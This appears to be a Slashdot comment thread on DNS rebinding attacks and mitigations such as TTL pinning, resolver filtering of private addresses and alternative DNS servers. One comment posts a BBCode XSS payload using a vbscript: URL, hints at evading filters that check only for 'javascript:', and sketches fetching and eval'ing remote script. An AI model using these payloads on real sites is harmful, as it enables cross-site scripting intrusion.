So if I modify my DNS cache server to ignore low TTLs and force a minimum TTL of 60 minutes, then I've defeated this issue. Of course, I've also broken external sites' ability to do quick failovers. But that can wait until a browser fix is out.

A browser fix could defeat this by holding DNS entries for a period of time. If a name changes from a non-RFC1918 address to an RFC1918 one, prompt the user with a warning about the security issue involved and advise them not to allow the change.

This would not protect against this same attack going out against other sites on the web, though. A hacker could change the DNS to point at eBay and submit a bid through your computer, for example. Since DNS that changes often with a low TTL is normal, this seems like a complex issue to fully solve.
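A hedged sketch of the browser-side check proposed above (not any shipping browser's behavior): remember whether a name last resolved publicly, and flag a public-to-RFC1918 flip.

function isRfc1918(ip) {
  var p = ip.split(".").map(Number);
  return p[0] === 10 ||
         (p[0] === 172 && p[1] >= 16 && p[1] <= 31) ||
         (p[0] === 192 && p[1] === 168);
}
var lastPrivate = {}; // hostname -> was the previous answer private?
function looksLikeRebind(host, ip) {
  var nowPrivate = isRfc1918(ip);
  var was = lastPrivate[host];
  lastPrivate[host] = nowPrivate;
  return was === false && nowPrivate; // public -> private transition
}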

caching no problem : (2, Insightful)

DrSkwid (118965) | more than 7 years ago | (#20140081)

1) run your own nameserver
2) use a new subdomain for every request
3) ???
4) profit

Re:Seems they forgot a few things (1)

flonker (526111) | more than 7 years ago | (#20140835)

A host can have multiple A records, so you don't need to take advantage of a 0 TTL; you can just use multiple A records and have the browser choose a random IP. You'll get a 50% success rate, but that's still pretty good.

Backup DNS Servers? (1)

Doc Ruby (173196) | more than 7 years ago | (#20137487)

Where can I find lists of DNS servers I can use instead of my cable modem's default from my ISP? Servers that will let me point at them, and that are fast and reliable.

I know one... (1)

woolio (927141) | more than 7 years ago | (#20137777)

Here's one that will* work for everyone: 127.0.0.1

*After you set up your own DNS server on the same computer.

Re:Backup DNS Servers? (2, Informative)

theGreater (596196) | more than 7 years ago | (#20138233)

OpenDNS ( http://www.opendns.com/ [opendns.com] ) works pretty well. I typically go internal cache, external ISP, openDNS on my systems. Keeps Windows boxes in line, especially.

-theGreater.

Re:Backup DNS Servers? (1)

Electrum (94638) | more than 7 years ago | (#20138277)

Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP?

OpenDNS [opendns.com]

Re:Backup DNS Servers? (1)

pfleming (683342) | more than 7 years ago | (#20141869)

OpenDNS uses wildcarding, which was despised when Network Solutions tried it. Granted, if all web servers had proper pointers it wouldn't be an issue, since www.slashdot.org would be the same as slashdot.org. OpenDNS also breaks the "I'm Feeling Lucky" lookup feature built into Firefox by removing Google from the loop. I tried it, I didn't like it. OpenDNS doesn't play well with my browsing habits. If I type domain.com instead of www.domain.com, Firefox will attempt to look up www.domain.com if domain.com doesn't have a pointer. Using OpenDNS, I end up on an OpenDNS search page instead.

Re:Backup DNS Servers? (1)

Magic5Ball (188725) | more than 7 years ago | (#20138617)

4.2.2.1-4.2.2.6. Anycasted for speedy access.

Bind9 (0)

Anonymous Coward | more than 7 years ago | (#20137701)

The report mentions altering a corporate firewall's DNS server to refuse to return external results that contain internal IP addresses, but fails to mention how to do this.

Does anyone have a link to a tutorial outlining this for Bind 9?

Re:Bind9 (3, Informative)

Morty (32057) | more than 7 years ago | (#20137905)

For now, bind9 does not support this. See the relevant thread [google.com].

There are far easier ways to exploit people (1)

BitZtream (692029) | more than 7 years ago | (#20138169)

There are plenty of other exploits that allow far greater control over all the IE users on the Internet than this one. It still relies on the user going to a malicious website in the first place. If you can draw users to that website, you might as well just fully exploit their browser and get some real code onto the machine, then use that, rather than bouncing crap around with javascript and constantly changing DNS entries.

And considering that I've already (after reading the article, mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, it's even less useful.

I'm glad they've brought this up, and it's a hard one to really secure in modern browsers due to the cross-plugin problems, but it's certainly not something that worries me. Not nearly as much as the users I have who click on the stupid 'You have a postcard from a neighbor' spams that always manage to get through our spam filters.

Re:There are far easier ways to exploit people (2, Informative)

Morty (32057) | more than 7 years ago | (#20138221)

It still relies on the user going to a malicious website in the first place.

If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.

And considering that I've already (after reading the article, mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, it's even less useful.
Cool! What server do you use, and how did you configure it to do this?

Re:There are far easier ways to exploit people (1)

KiloByte (825081) | more than 7 years ago | (#20139237)

If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.
That's yet another reason to block known advertisers: personally with AdBlock, or company-wide with stuff like dnscruft.

Re:There are far easier ways to exploit people (1)

Tony Hoyle (11698) | more than 7 years ago | (#20139789)

Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.

Re:There are far easier ways to exploit people (1)

Morty (32057) | more than 7 years ago | (#20140099)

Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.

That's not the problem. The problem is requests from internal addresses for external names that resolve to internal addresses. How do you block *that*?
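One conceivable shape for such a filter, sketched with placeholder logic (an assumption about how it could work, not a feature of any server discussed in this thread): the site's caching resolver drops answers from external zones that fall inside the internal ranges.

// Drop A records pointing into private space unless the zone is internal.
function filterAnswers(zoneIsOurs, ips) {
  if (zoneIsOurs) return ips; // our own zones may legitimately use RFC1918
  return ips.filter(function (ip) {
    var p = ip.split(".").map(Number);
    var isPrivate = p[0] === 10 ||
                    (p[0] === 172 && p[1] >= 16 && p[1] <= 31) ||
                    (p[0] === 192 && p[1] === 168);
    return !isPrivate;
  });
}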

Re:There are far easier ways to exploit people (1)

DrSkwid (118965) | more than 7 years ago | (#20140101)

Not if you use an XSS vulnerability. I already know one popular site I could use.
HINT: XSS filters sometimes check only for the javascript: version.

I think https would sort most of this problem out. Cheap certs really are a must!

Re:There are far easier ways to exploit people (1)

DrSkwid (118965) | more than 7 years ago | (#20140157)

Bah, slashcode ate my comment. I'll do it in BBCode, seeing as that's usually the place to exploit it:

[img]vbscript:msgbox("xss js 0wns j00")[/img]

Use the vbscript of your choice; I'd pop an XMLHttpRequest out, eval the returned javascript, and off you go.

We need this, now! (1)

dkf (304284) | more than 7 years ago | (#20139563)

... so that we can redirect links to the paper explaining all to a server that isn't slashdotted...

Multi-pin? (1)

Ortega-Starfire (930563) | more than 7 years ago | (#20141253)

Multi-Pass!

(Sorry, it was the first thing that came to mind.)